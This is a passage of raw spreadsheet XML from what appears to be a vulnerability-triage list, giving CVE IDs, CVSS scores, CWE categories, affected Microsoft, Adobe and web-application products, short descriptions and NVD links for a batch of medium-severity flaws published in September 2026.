microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1314" s="5" t="inlineStr" /><c r="M1314" s="5" t="inlineStr" /><c r="N1314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1314" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1314" s="5" t="inlineStr" /><c r="R1314" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1314" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t></is></c></row><row r="1315"><c r="A1315" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1315" s="5" t="inlineStr"><is><t>CVE-2026-81400</t></is></c><c r="D1315" s="5" t="n"><v>5.5</v></c><c r="E1315" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1315" s="5" t="inlineStr" /><c r="H1315" s="5" t="n"><v>0.004</v></c><c r="I1315" s="5" t="inlineStr" /><c r="J1315" s="5" t="inlineStr" /><c r="K1315" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1315" s="5" t="inlineStr" /><c r="M1315" s="5" t="inlineStr" /><c r="N1315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1315" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1315" s="5" t="inlineStr" /><c r="R1315" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1315" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t></is></c></row><row r="1316"><c r="A1316" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1316" s="5" t="inlineStr"><is><t>CVE-2026-81401</t></is></c><c r="D1316" s="5" t="n"><v>5.5</v></c><c r="E1316" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1316" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1316" s="5" t="inlineStr" /><c r="H1316" s="5" t="n"><v>0.005</v></c><c r="I1316" s="5" t="inlineStr" /><c r="J1316" s="5" t="inlineStr" /><c r="K1316" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1316" s="5" t="inlineStr" /><c r="M1316" s="5" t="inlineStr" /><c r="N1316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1316" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1316" s="5" t="inlineStr" /><c r="R1316" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S1316" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t></is></c></row><row r="1317"><c r="A1317" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1317" s="5" t="inlineStr"><is><t>CVE-2026-81958</t></is></c><c r="D1317" s="5" t="n"><v>5.5</v></c><c r="E1317" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1317" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1317" s="5" t="inlineStr" /><c r="H1317" s="5" t="n"><v>0.004</v></c><c r="I1317" s="5" t="inlineStr" /><c r="J1317" s="5" t="inlineStr" /><c r="K1317" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1317" s="5" t="inlineStr" /><c r="M1317" s="5" t="inlineStr" /><c r="N1317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1317" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1317" s="5" t="inlineStr" /><c r="R1317" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1317" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t></is></c></row><row r="1318"><c r="A1318" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1318" s="5" t="inlineStr"><is><t>CVE-2026-81977</t></is></c><c r="D1318" s="5" t="n"><v>5.5</v></c><c r="E1318" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1318" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1318" s="5" t="inlineStr" /><c r="H1318" s="5" t="n"><v>0.002</v></c><c r="I1318" s="5" t="inlineStr" /><c r="J1318" s="5" t="inlineStr" /><c r="K1318" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1318" s="5" t="inlineStr" /><c r="M1318" s="5" t="inlineStr" /><c r="N1318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1318" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1318" s="5" t="inlineStr" /><c r="R1318" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1318" s="5" t="inlineStr"><is><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is></c><c r="T1318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t></is></c></row><row r="1319"><c r="A1319" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1319" s="5" t="inlineStr"><is><t>CVE-2026-81978</t></is></c><c r="D1319" s="5" t="n"><v>5.5</v></c><c r="E1319" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1319" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1319" s="5" t="inlineStr" /><c r="H1319" s="5" t="n"><v>0.002</v></c><c r="I1319" s="5" t="inlineStr" /><c r="J1319" s="5" t="inlineStr" /><c r="K1319" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1319" s="5" t="inlineStr" /><c r="M1319" s="5" t="inlineStr" /><c r="N1319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1319" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1319" s="5" t="inlineStr" /><c r="R1319" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1319"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19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t></is></c></row><row r="1320"><c r="A1320" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1320" s="5" t="inlineStr"><is><t>CVE-2026-81982</t></is></c><c r="D1320" s="5" t="n"><v>5.5</v></c><c r="E1320" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1320" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1320" s="5" t="inlineStr" /><c r="H1320" s="5" t="n"><v>0.002</v></c><c r="I1320" s="5" t="inlineStr" /><c r="J1320" s="5" t="inlineStr" /><c r="K1320" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1320" s="5" t="inlineStr" /><c r="M1320" s="5" t="inlineStr" /><c r="N1320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1320" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1320" s="5" t="inlineStr" /><c r="R1320" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1320"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20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t></is></c></row><row r="1321"><c r="A1321" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1321" s="5" t="inlineStr"><is><t>CVE-2026-81984</t></is></c><c r="D1321" s="5" t="n"><v>5.5</v></c><c r="E1321" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1321" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1321" s="5" t="inlineStr" /><c r="H1321" s="5" t="n"><v>0.002</v></c><c r="I1321" s="5" t="inlineStr" /><c r="J1321" s="5" t="inlineStr" /><c r="K1321" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1321" s="5" t="inlineStr" /><c r="M1321" s="5" t="inlineStr" /><c r="N1321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1321" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1321" s="5" t="inlineStr" /><c r="R1321" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1321"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T1321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t></is></c></row><row r="1322"><c r="A1322" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1322" s="5" t="inlineStr"><is><t>CVE-2026-81991</t></is></c><c r="D1322" s="5" t="n"><v>5.5</v></c><c r="E1322" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1322" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1322" s="5" t="inlineStr" /><c r="H1322" s="5" t="n"><v>0.002</v></c><c r="I1322" s="5" t="inlineStr" /><c r="J1322" s="5" t="inlineStr" /><c r="K1322" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1322" s="5" t="inlineStr" /><c r="M1322" s="5" t="inlineStr" /><c r="N1322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1322" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1322" s="5" t="inlineStr" /><c r="R1322" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1322"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22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t></is></c></row><row r="1323"><c r="A1323" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1323" s="5" t="inlineStr"><is><t>CVE-2026-81993</t></is></c><c r="D1323" s="5" t="n"><v>5.5</v></c><c r="E1323" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1323" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1323" s="5" t="inlineStr" /><c r="H1323" s="5" t="n"><v>0.002</v></c><c r="I1323" s="5" t="inlineStr" /><c r="J1323" s="5" t="inlineStr" /><c r="K1323" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1323" s="5" t="inlineStr" /><c r="M1323" s="5" t="inlineStr" /><c r="N1323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1323" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1323" s="5" t="inlineStr" /><c r="R1323" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1323" s="5" t="inlineStr"><is><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is></c><c r="T1323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t></is></c></row><row r="1324"><c r="A1324" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1324" s="5" t="inlineStr"><is><t>CVE-2026-82001</t></is></c><c r="D1324" s="5" t="n"><v>5.5</v></c><c r="E1324" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1324" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1324" s="5" t="inlineStr" /><c r="H1324" s="5" t="n"><v>0.002</v></c><c r="I1324" s="5" t="inlineStr" /><c r="J1324" s="5" t="inlineStr" /><c r="K1324" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1324" s="5" t="inlineStr" /><c r="M1324" s="5" t="inlineStr" /><c r="N1324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1324" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1324" s="5" t="inlineStr" /><c r="R1324" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S1324" s="5" t="inlineStr"><is><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is></c><c r="T1324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t></is></c></row><row r="1325"><c r="A1325" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1325" s="5" t="inlineStr"><is><t>CVE-2026-83501</t></is></c><c r="D1325" s="5" t="n"><v>5.5</v></c><c r="E1325" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1325" s="5" t="inlineStr" /><c r="H1325" s="5" t="n"><v>0.003</v></c><c r="I1325" s="5" t="inlineStr" /><c r="J1325" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1325" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1325" s="5" t="inlineStr" /><c r="M1325" s="5" t="inlineStr" /><c r="N1325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1325" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1325" s="5" t="inlineStr" /><c r="R1325" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1325" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t></is></c><c r="T1325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t></is></c></row><row r="1326"><c r="A1326" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1326" s="5" t="inlineStr"><is><t>CVE-2026-83949</t></is></c><c r="D1326" s="5" t="n"><v>5.5</v></c><c r="E1326" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1326" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1326" s="5" t="inlineStr" /><c r="H1326" s="5" t="n"><v>0.004</v></c><c r="I1326" s="5" t="inlineStr" /><c r="J1326" s="5" t="inlineStr" /><c r="K1326" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1326" s="5" t="inlineStr" /><c r="M1326" s="5" t="inlineStr" /><c r="N1326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1326" s="5" t="inlineStr" /><c r="R1326" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1326" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t></is></c></row><row r="1327"><c r="A1327" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1327" s="5" t="inlineStr"><is><t>CVE-2026-83951</t></is></c><c r="D1327" s="5" t="n"><v>5.5</v></c><c r="E1327" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1327" s="5" t="inlineStr" /><c r="H1327" s="5" t="n"><v>0.004</v></c><c r="I1327" s="5" t="inlineStr" /><c r="J1327" s="5" t="inlineStr" /><c r="K1327" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1327" s="5" t="inlineStr" /><c r="M1327" s="5" t="inlineStr" /><c r="N1327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1327" s="5" t="inlineStr" /><c r="R1327" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1327" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t></is></c></row><row r="1328"><c r="A1328" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1328" s="5" t="inlineStr"><is><t>CVE-2026-83991</t></is></c><c r="D1328" s="5" t="n"><v>5.5</v></c><c r="E1328" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1328" s="5" t="inlineStr" /><c r="H1328" s="5" t="n"><v>0.003</v></c><c r="I1328" s="5" t="inlineStr" /><c r="J1328" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1328"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328" s="5" t="inlineStr" /><c r="M1328" s="5" t="inlineStr" /><c r="N1328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1328" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1328" s="5" t="inlineStr" /><c r="R1328" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1328" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t></is></c></row><row r="1329"><c r="A1329" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1329" s="5" t="inlineStr"><is><t>CVE-2026-85875</t></is></c><c r="D1329" s="5" t="n"><v>5.5</v></c><c r="E1329" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1329" s="5" t="inlineStr" /><c r="H1329" s="5" t="n"><v>0.004</v></c><c r="I1329" s="5" t="inlineStr" /><c r="J1329" s="5" t="inlineStr" /><c r="K1329" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1329" s="5" t="inlineStr" /><c r="M1329" s="5" t="inlineStr" /><c r="N1329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1329" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1329" s="5" t="inlineStr" /><c r="R1329" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1329" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t></is></c></row><row r="1330"><c r="A1330" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1330" s="5" t="inlineStr"><is><t>CVE-2026-86084</t></is></c><c r="D1330" s="5" t="n"><v>5.5</v></c><c r="E1330" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1330" s="5" t="inlineStr" /><c r="H1330" s="5" t="n"><v>0.003</v></c><c r="I1330" s="5" t="inlineStr" /><c r="J1330" s="5" t="inlineStr" /><c r="K1330" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1330" s="5" t="inlineStr" /><c r="M1330" s="5" t="inlineStr" /><c r="N1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1330" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1330" s="5" t="inlineStr" /><c r="R1330" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S1330" s="5" t="inlineStr"><is><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is></c><c r="T1330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86084</t></is></c></row><row r="1331"><c r="A1331" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1331" s="5" t="inlineStr"><is><t>CVE-2026-86511</t></is></c><c r="D1331" s="5" t="n"><v>5.5</v></c><c r="E1331" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1331" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1331" s="5" t="inlineStr" /><c r="H1331" s="5" t="n"><v>0.004</v></c><c r="I1331" s="5" t="inlineStr" /><c r="J1331" s="5" t="inlineStr" /><c r="K1331" s="5" t="inlineStr" /><c r="L1331" s="5" t="inlineStr" /><c r="M1331" s="5" t="inlineStr" /><c r="N1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1331" s="5" t="inlineStr" /><c r="R1331" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1331" s="5" t="inlineStr"><is><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is></c><c r="T1331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t></is></c></row><row r="1332"><c r="A1332" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1332" s="5" t="inlineStr"><is><t>CVE-2026-86513</t></is></c><c r="D1332" s="5" t="n"><v>5.5</v></c><c r="E1332" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1332" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1332" s="5" t="inlineStr" /><c r="H1332" s="5" t="n"><v>0.004</v></c><c r="I1332" s="5" t="inlineStr" /><c r="J1332" s="5" t="inlineStr" /><c r="K1332" s="5" t="inlineStr" /><c r="L1332" s="5" t="inlineStr" /><c r="M1332" s="5" t="inlineStr" /><c r="N1332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1332" s="5" t="inlineStr" /><c r="R1332" s="5" t="inlineStr"><is><t>CWE-400, CWE-770</t></is></c><c r="S1332" s="5" t="inlineStr"><is><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is></c><c r="T1332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t></is></c></row><row r="1333"><c r="A1333" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1333" s="5" t="inlineStr"><is><t>CVE-2026-86519</t></is></c><c r="D1333" s="5" t="n"><v>5.5</v></c><c r="E1333" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1333" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1333" s="5" t="inlineStr" /><c r="H1333" s="5" t="n"><v>0.003</v></c><c r="I1333" s="5" t="inlineStr" /><c r="J1333" s="5" t="inlineStr" /><c r="K1333" s="5" t="inlineStr" /><c r="L1333" s="5" t="inlineStr" /><c r="M1333" s="5" t="inlineStr" /><c r="N1333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1333" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1333" s="5" t="inlineStr" /><c r="R1333" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1333" s="5" t="inlineStr"><is><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is></c><c r="T1333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t></is></c></row><row r="1334"><c r="A1334" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1334" s="5" t="inlineStr"><is><t>CVE-2026-86665</t></is></c><c r="D1334" s="5" t="n"><v>5.5</v></c><c r="E1334" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1334" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1334" s="5" t="inlineStr" /><c r="H1334" s="5" t="n"><v>0.004</v></c><c r="I1334" s="5" t="inlineStr" /><c r="J1334" s="5" t="inlineStr" /><c r="K1334" s="5" t="inlineStr" /><c r="L1334" s="5" t="inlineStr" /><c r="M1334" s="5" t="inlineStr" /><c r="N1334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1334" s="5" t="inlineStr" /><c r="R1334" s="5" t="inlineStr"><is><t>CWE-862, CWE-863</t></is></c><c r="S1334" s="5" t="inlineStr"><is><t>A vulnerability was identified in aircheng-org iWebShop-5 up to 5.15. This issue affects the function Update::index of the file controllers/update.php. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86665</t></is></c></row><row r="1335"><c r="A1335" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1335" s="5" t="inlineStr"><is><t>CVE-2026-86666</t></is></c><c r="D1335" s="5" t="n"><v>5.5</v></c><c r="E1335" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1335" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1335" s="5" t="inlineStr" /><c r="H1335" s="5" t="n"><v>0.005</v></c><c r="I1335" s="5" t="inlineStr" /><c r="J1335" s="5" t="inlineStr" /><c r="K1335" s="5" t="inlineStr" /><c r="L1335" s="5" t="inlineStr" /><c r="M1335" s="5" t="inlineStr" /><c r="N1335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1335" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1335" s="5" t="inlineStr" /><c r="R1335" s="5" t="inlineStr"><is><t>CWE-284, CWE-434</t></is></c><c r="S1335" s="5" t="inlineStr"><is><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is></c><c r="T1335" s="6" 